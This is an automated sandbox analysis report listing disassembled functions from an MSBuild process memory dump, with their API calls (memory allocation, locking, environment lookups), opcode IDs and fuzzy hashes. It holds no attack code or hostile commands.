                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d243e1b8cd931a6e6b4b21a3ffcc558895928accf25e7507c67f46aefc1f5d83
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBD18F71B04B469FD708CF28C580799FBE1FF88304F01866DD85987751EB31A9A9CB82
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAD5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount64.KERNEL32 ref: 6CAD5D40
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3F688), ref: 6CAD5D67
                                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CAD5DB4
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3F688), ref: 6CAD5DED
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 557828605-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1813c0b2ceafbb7807b085a225cdd1e3750e98bfc24c216fbf3152f45eb528a2
                                                                                                                                                                                                                                                                            • Instruction ID: 58ae1bf59d07c8e21bd5061ba13f60fba03d100fb9b964236f0baa45c8168a05
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1813c0b2ceafbb7807b085a225cdd1e3750e98bfc24c216fbf3152f45eb528a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D515EB1F001698FCF18CFA8C954BAEBBB1FB89304F1A8659D859A7754C7307985CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CABCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CABCEBD
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CABCEF5
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CABCF4E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcpy$memset
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 47d26cfd650b1789e98dcc3fae22fc88c49003cffed1084e580774445de2849d
                                                                                                                                                                                                                                                                            • Instruction ID: fe0ccae8ee379a79648394a80ee2e393898b8e3a47221ffd78e8673028bacaab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47d26cfd650b1789e98dcc3fae22fc88c49003cffed1084e580774445de2849d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E351F275A00256CFCB00CF18C490EAABBB9EF99304F198599E8595F351D735ED46CBE0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAF6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CAF82BC,?,?), ref: 6CAF649B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAF64A9
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA80: GetCurrentThreadId.KERNEL32 ref: 6CAEFA8D
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA80: AcquireSRWLockExclusive.KERNEL32(6CB3F448), ref: 6CAEFA99
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAF653F
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CAF655A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9d3690c9f8fe528e780700715556a2773e40b39c8c5c2414f18b33013cc61e35
                                                                                                                                                                                                                                                                            • Instruction ID: 6624df5c2f5bd632885333fe15f0bb3a8f0ac7fc16161e4fdd18e77019b5f3c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d3690c9f8fe528e780700715556a2773e40b39c8c5c2414f18b33013cc61e35
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81317EB5A043559FD700DF14D984A9EBBE4FF88318F00842EE85A97741DB30E909CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CACB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CACB4F5
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CACB502
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CACB542
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CACB578
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                            • Opcode ID: ac2bc5264f12acb6866cbdc2837669b31747fa12d0eb0d689af2cb1f0199f6da
                                                                                                                                                                                                                                                                            • Instruction ID: df778cdc2e09eada43c57db8a2a4f27051bd201252d047069ff6574395c3636b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac2bc5264f12acb6866cbdc2837669b31747fa12d0eb0d689af2cb1f0199f6da
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6110630A04B45C7D3228F29D5007A6B3B0FF96319F14970AE84E53A02EBB2B5C58791
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAF3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CABF20E,?), ref: 6CAF3DF5
                                                                                                                                                                                                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CABF20E,00000000,?), ref: 6CAF3DFC
                                                                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CAF3E06
                                                                                                                                                                                                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CAF3E0E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECC00: GetCurrentProcess.KERNEL32(?,?,6CAB31A7), ref: 6CAECC0D
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CAB31A7), ref: 6CAECC16
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0956bb3c6d56f2177dea96f722e23f9cb064d644ae7233fe7ade2d8fb334fc18
                                                                                                                                                                                                                                                                            • Instruction ID: 0ce3d5426380d67658751951c18d889f448ca5caa8ff0c68668e059de2b75f1c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0956bb3c6d56f2177dea96f722e23f9cb064d644ae7233fe7ade2d8fb334fc18
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F012B15002187BDB04AB54DC41DAF376DDF46628F040020FD1C57741D635BD5996F7
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB085B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CB085D3
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                            • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CB08725
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                            • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                            • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                            • Opcode ID: 8f4507e63071fe3ed2dd316b347ff4948ce6f3898f38a8be113fa5359d0678de
                                                                                                                                                                                                                                                                            • Instruction ID: 5afb694c281f1bb328cbfd167b7bb0e59dee32db10ae43469ec97f21eff85398
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f4507e63071fe3ed2dd316b347ff4948ce6f3898f38a8be113fa5359d0678de
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72516674A00681CFD701CF18C184A5ABBF1FF5A328F1AC18AD8595BB52C736E985CF92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAF3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CAF3D19
                                                                                                                                                                                                                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CAF3D6C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                                                                                            • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                            • Opcode ID: cce240c65e23b39a39c3203cac37de0b707d53f55703b20a435a2fd94cbfb282
                                                                                                                                                                                                                                                                            • Instruction ID: 0220ee58572e48928bce5778632969c118ee7bdc45759d3430de29a60d9d7a67
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cce240c65e23b39a39c3203cac37de0b707d53f55703b20a435a2fd94cbfb282
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44110431E04688D7DF008B69CC154FDB775EF8A318B488619EC9897602FB30A9C9C7A1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB16DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CB16E22
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CB16E3F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CB16E1D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                            • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                            • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                            • Opcode ID: d7acaf9c9ee59e2de2379188ccb270e1021d56f3065c32f09ec6cde629e71857
                                                                                                                                                                                                                                                                            • Instruction ID: 45e191ffd474ea54dc93ebf1221728b63c8dd3db4507d7eb05f5bd7973c946b3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7acaf9c9ee59e2de2379188ccb270e1021d56f3065c32f09ec6cde629e71857
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85F0E9767492C0CBDB209B68C950E997B72D717228F0412E7C40D87F71D731E95ACA93
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB0B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CB0B2C9,?,?,?,6CB0B127,?,?,?,?,?,?,?,?,?,6CB0AE52), ref: 6CB0B628
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB090E0: free.MOZGLUE(?,00000000,?,?,6CB0DEDB), ref: 6CB090FF
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB090E0: free.MOZGLUE(?,00000000,?,?,6CB0DEDB), ref: 6CB09108
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CB0B2C9,?,?,?,6CB0B127,?,?,?,?,?,?,?,?,?,6CB0AE52), ref: 6CB0B67D
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CB0B2C9,?,?,?,6CB0B127,?,?,?,?,?,?,?,?,?,6CB0AE52), ref: 6CB0B708
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CB0B127,?,?,?,?,?,?,?,?), ref: 6CB0B74D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: freemalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6d9f8a197725090e8cf24d994344b145f791e1aabad09a74e41f89ef30a0abb1
                                                                                                                                                                                                                                                                            • Instruction ID: 65a105ad7884549b6e911b1fc1e4f9f445408ebc1b2d16a2cd7f3aaf9d457474
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d9f8a197725090e8cf24d994344b145f791e1aabad09a74e41f89ef30a0abb1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F951DCB5B052568FDB14CF58C98076EBBB5FF85306F45852DC85AABB00DB31A804CBA2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB1B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CAC0A4D), ref: 6CB1B5EA
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CAC0A4D), ref: 6CB1B623
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CAC0A4D), ref: 6CB1B66C
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6CAC0A4D), ref: 6CB1B67F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: malloc$free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                            • Opcode ID: 20059032654df776b78f7ed2165db8196c84a345ff6b50983e2e0872359dfaf4
                                                                                                                                                                                                                                                                            • Instruction ID: 46a64fbb29d5a27a7575a8e3659105951a44f78fd330001914bbb07c25b5e992
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20059032654df776b78f7ed2165db8196c84a345ff6b50983e2e0872359dfaf4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3431E6B1A052668FDB10CF58C84465EFBF5FF91304F168669C80A9BB05EB31E915CBE1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAEF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CAEF611
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CAEF623
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CAEF652
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CAEF668
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                            • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                            • Instruction ID: 095d64e88f964f07c748b3ca27b642e172e601832cceccbad2c0c3e62b6fecb3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23313E71A00214AFD724CF5DDCC0A9F77B5EB98354B18893DEA498BB04D631E984CBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%